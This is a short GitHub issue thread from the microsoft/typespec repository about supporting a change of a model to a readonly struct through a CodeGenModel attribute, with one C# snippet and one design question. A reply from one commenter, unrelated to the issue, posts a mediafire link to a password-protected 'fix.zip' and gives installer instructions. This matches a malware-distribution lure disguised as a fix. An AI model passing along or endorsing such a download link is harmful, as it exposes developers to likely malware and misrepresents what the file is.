### ISSUE TITLE
Support change model to struct with custom code

### ISSUE THREAD

**Issue by m-nash** [microsoft/typespec#4259]
Support

```c#
namespace Original.Namespace

[CodeGenModel{"OldName"}]
public partial readonly struct NewName{}
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ArcturusZhang** [comment]
Do you think `CodeGenModel(oldName)` is quite duplicated with `CodeGenType(oldName)`?
